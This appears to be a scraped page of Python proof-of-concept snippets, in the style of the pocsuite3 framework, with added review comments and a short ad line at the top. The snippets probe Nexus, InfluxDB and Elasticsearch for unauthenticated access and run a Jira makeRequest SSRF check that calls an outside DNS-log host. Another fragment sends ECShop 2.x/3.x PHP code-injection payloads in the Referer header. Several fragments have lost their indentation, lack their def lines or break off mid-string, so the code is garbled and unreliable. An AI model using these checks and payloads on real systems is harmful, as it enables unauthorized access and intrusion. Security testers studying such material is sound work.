Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
def get_vul_url(self, p_url, p_headers):
    """Return ``p_url`` extended with the id of the "yum" capability.

    Sends a GET request to ``p_url`` (certificate verification disabled,
    redirects not followed) and scans the JSON body for entries whose
    ``['capability']['typeId']`` equals ``"yum"``.

    Args:
        p_url: URL that is queried for the capability list.
        p_headers: Headers sent with the request.

    Returns:
        ``p_url + "/" + <capability id>``. When several entries match, the
        last one wins. When nothing matches, or the status code is neither
        200 nor 401, the id is empty and the result is ``p_url + "/"``.

    Raises:
        SystemExit: When the server answers 401.
    """
    r = req.get(p_url, verify=False, headers=p_headers, allow_redirects=False)

    if r.status_code == 401:
        print("[!] User credentials wrong! Quit!")
        sys.exit()

    capa_id = ""
    if r.status_code == 200:
        # Decode the body once; a falsy payload simply yields no entries.
        for entry in r.json() or ():
            capability = entry['capability']
            if capability['typeId'] == "yum":
                print("[*] Vulnerable id is: {0}".format(capability['id']))
                capa_id = capability['id']

    return p_url + "/" + capa_id
def _verify(self):
    """Probe ``self.url`` for an InfluxDB instance that answers ``show users``.

    Two requests are made, neither carrying explicit credentials:

    1. ``GET <url>/ping`` must return 204 with an ``x-influxdb-version``
       response header.
    2. ``GET <url>/query?q=show%20users`` must return 200 and a JSON body
       whose string form contains both ``columns`` and ``user``.

    When both checks pass, ``result['VerifyInfo']['URL']`` is set to the
    target URL.

    Returns:
        Whatever ``self.save_output(result)`` returns. ``result`` is empty
        when a check fails or a request/parse error occurs.
    """
    result = {}
    base_url = self.url
    ping_url = base_url + '/ping'
    query_url = base_url + '/query?q=show%20users'

    try:
        resp = req.get(ping_url)
        # Use the response headers to confirm the target really is InfluxDB.
        if resp.status_code == 204 and "x-influxdb-version" in resp.headers:
            resp = req.get(query_url)
            body_text = str(resp.json())
            # Status 200 plus "columns" and "user" in the stringified JSON
            # is treated as a successful query.
            if resp.status_code == 200 and 'columns' in body_text and 'user' in body_text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = base_url
    except Exception as e:
        # Best-effort probe: report the error and fall through to the
        # common exit so the caller still receives an output object.
        print(e)

    # Single exit: previously the exception path returned None.
    return self.save_output(result)
# NOTE(review): this span looks like the body of a separate probe whose
# `def` line is not visible here; `vul_url` and `result` are not assigned
# in these lines - confirm against the full file.
# It requests `<vul_url>/` and then `<vul_url>/_cat`, and records the target
# URL in `result` when both responses match the checks below.
target_url = vul_url
# Passing True yields host and port; see: https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
#host, port = url2ip(target_url, True)
# Request the root path
ROOT_PATH = '/'
ROOT_URL = vul_url + ROOT_PATH
# Request the /_cat path
QUERY_PATH = '/_cat'
QUERY_URL = vul_url + QUERY_PATH
try:
resp = req.get(ROOT_URL)
# 1. Does the body contain `You Know, for Search`, and is Content-Type 'application/json'?
# NOTE(review): only the status code and Content-Type are tested below;
# the body text is not inspected.
if resp.status_code == 200 and 'application/json' in resp.headers['Content-Type'].lower():
resp = req.get(QUERY_URL)
# 2. Status code is 200 and the response contains `/_cat/master`
if resp.status_code == 200 and '/_cat/master' in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except Exception as e:
print(e)
# NOTE(review): print_stack() prints the current call stack, not the
# exception's traceback - traceback.print_exc() may have been intended.
traceback.print_stack()
def _verify(self):
    """Probe ``self.url`` via the gadgets ``makeRequest`` servlet endpoint.

    Builds ``<url>/plugins/servlet/gadgets/makeRequest?url=<url>@<payload>``
    and requests it with the ``X-Atlassian-Token: no-check`` header, through
    ``self.proxies`` and with certificate verification disabled. After a
    two-second pause it calls ``self.test_dnslog(self.CEYE_URL)``; a truthy
    answer records the request URL in ``result['VerifyInfo']['URL']``.

    Returns:
        Whatever ``self.save_output(result)`` returns; ``result`` is empty
        when the DNS-log check is falsy.
    """
    # Function-scope import keeps this block self-contained.
    import traceback

    result = {}
    vul_url = self.url
    payload = 'ip.cn:80'  # replace with the dnslog address
    target_url = "{0}/plugins/servlet/gadgets/makeRequest?url={0}@{1}".format(vul_url, payload)
    headers = {"X-Atlassian-Token": "no-check"}

    try:
        req.get(target_url, headers=headers, proxies=self.proxies, verify=False)
    except Exception:
        # Was `e.printStackTrace()`, a Java idiom that raises AttributeError
        # in Python and so masked the original request error.
        traceback.print_exc()

    time.sleep(2)  # sleep 2s to give ceye time to record the lookup

    if self.test_dnslog(self.CEYE_URL):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = target_url
    return self.save_output(result)
# NOTE(review): fragment - the enclosing `def` is not visible; `phpcode` and
# `url` are not assigned in these lines, and the span is cut off inside the
# final call. Confirm against the full file.
# Builds one payload per supported ECShop line from `phpcode`.
ec2payload = self.gen_ec2payload(phpcode)
# ECShop 3.x payload
ec3payload = self.gen_ec3payload(phpcode)
# The "app_version" option selects which payloads are tried; each entry is a
# (payload, version label) pair.
option = self.get_option("app_version")
if option == "Auto":
payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
elif option == "2.x":
payloads = [(ec2payload, '2.x')]
elif option == '3.x':
payloads = [(ec3payload, '3.x')]
# NOTE(review): there is no else branch, so `payloads` is unbound for any
# other option value.
# payloads = [ec2payload, ec3payload]
for payload in payloads:
# The payload string is sent in the Referer header.
headers = {'Referer': payload[0]}
resp = requests.get(url, headers=headers)
# NOTE(review): the quoting of the third argument below looks garbled
# (probably lost in extraction); left untouched.
r = get_middle_text(resp.text, '''<input value="''', " name="back_act" type="hidden">")
if r:
return r
# NOTE(review): the next call is truncated - its triple-quoted string is
# never closed in the visible source.
r = get_middle_text(resp.text, '''
# NOTE(review): fragment - the enclosing `def` is not visible; `vul_url` and
# `result` are not assigned in these lines. Confirm against the full file.
# It requests `<vul_url>/ping` and then `<vul_url>/query?q=show%20users`, and
# records the target URL in `result` when both responses match the checks
# below.
target_url = vul_url
PING_PATH = '/ping'
PING_URL = vul_url + PING_PATH
QUERY_PATH = '/query?q=show%20users'
QUERY_URL = vul_url + QUERY_PATH
try:
resp = req.get(PING_URL)
# Use the response headers to confirm the target really is InfluxDB
if resp.status_code == 204 and "x-influxdb-version" in resp.headers:
resp = req.get(QUERY_URL)
str_resp_json = str(resp.json())
# Status code 200 and the stringified JSON contains "columns" and "user": the query is considered successful
if resp.status_code == 200 and 'columns' in str_resp_json and 'user' in str_resp_json:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except Exception as e:
print(e)
# NOTE(review): print_stack() prints the current call stack, not the
# exception's traceback - traceback.print_exc() may have been intended.
traceback.print_stack()
# Error path: still hand `result` to save_output.
return self.save_output(result)